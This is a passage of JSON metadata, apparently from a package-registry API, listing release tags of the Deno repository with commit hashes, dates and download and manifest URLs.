noland/deno@std%2F0.69.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0/manifests"},{"name":"v1.3.3","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3/manifests"},{"name":"std/0.68.0","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.68.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.68.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.68.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0/manifests"},{"name":"v1.3.2","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2/manifests"},{"name":"std/0.67.0","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.67.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.67.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.67.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0/manifests"},{"name":"v1.3.1","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1/manifests"},{"name":"std/0.66.0","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.66.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.66.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.66.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0/manifests"},{"name":"v1.3.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0/manifests"},{"name":"std/0.65.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.65.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.65.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.65.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0/manifests"},{"name":"v1.2.3","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3/manifests"},{"name":"std/0.64.0","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.64.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.64.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.64.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0/manifests"},{"name":"v1.2.2","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2/manifests"},{"name":"std/0.63.0","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.63.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.63.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.63.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0/manifests"},{"name":"v1.2.1","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1/manifests"},{"name":"std/0.62.0","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.62.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.62.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.62.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0/manifests"},{"name":"v1.2.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0/manifests"},{"name":"std/0.61.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.61.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.61.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.61.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0/manifests"},{"name":"v1.1.3","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3/manifests"},{"name":"std/0.60.0","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.60.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.60.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.60.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0/manifests"},{"name":"v1.1.2","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2/manifests"},{"name":"std/0.59.0","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.59.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.59.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.59.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0/manifests"},{"name":"v1.1.1","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1/manifests"},{"name":"std/0.58.0","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.58.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.58.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.58.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0/manifests"},{"name":"v1.1.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0/manifests"},{"name":"std/0.57.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.57.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.57.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.57.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0/manifests"},{"name":"v1.0.5","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5/manifests"},{"name":"std/0.56.0","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.56.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.56.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.56.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0/manifests"},{"name":"v1.0.4","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4/manifests"},{"name":"std/0.55.0","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.55.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.55.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.55.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0/manifests"},{"name":"v1.0.3","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3/manifests"},{"name":"std/0.54.0","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.54.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.54.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.54.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0/manifests"},{"name":"std/0.53.0","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.53.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.53.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.53.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0/manifests"},{"name":"v1.0.2","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2/manifests"},{"name":"v1.0.1","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1/manifests"},{"name":"std/0.52.0","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.52.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.52.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.52.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0/manifests"},{"name":"std/0.51.0","sha":"c474d383543708fc636c06dd2e4a9100495f45c5","kind":"commit","published_at":"2020-05-14T11:45:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.51.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.51.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.51.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0/manifests"},{"name":"v1.0.0","sha":"55d2c6bd103879263c115fa5697f3cf3101158f4","kind":"commit","published_at":"2020-05-13T22:07:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc3","sha":"35e8bc8de65b523e082d446dc25f114ed81264a8","kind":"commit","published_at":"2020-05-12T12:33:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc2","sha":"d8f5b37218715bbc624eb53dd4b7409867b2c803","kind":"commit","published_at":"2020-05-09T19:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2/manifests"},{"name":"std/0.50.0","sha":"d5dd5ae87d7598643a46f27fa4a11b2a85d42be8","kind":"commit","published_at":"2020-05-09T13:15:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.50.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.50.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.50.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0/manifests"},{"name":"v1.0.0-rc1","sha":"5f67a202ff59f25ea183c261f664a6db06407e17","kind":"commit","published_at":"2020-05-04T19:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1/manifests"},{"name":"v0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0/manifests"},{"name":"std/0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0/manifests"},{"name":"v0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0/manifests"},{"name":"std/0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0/manifests"},{"name":"v0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0/manifests"},{"name":"std/0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0/manifests"},{"name":"v0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.39.0","tag_url":"https://repos.ecosyste.ms/a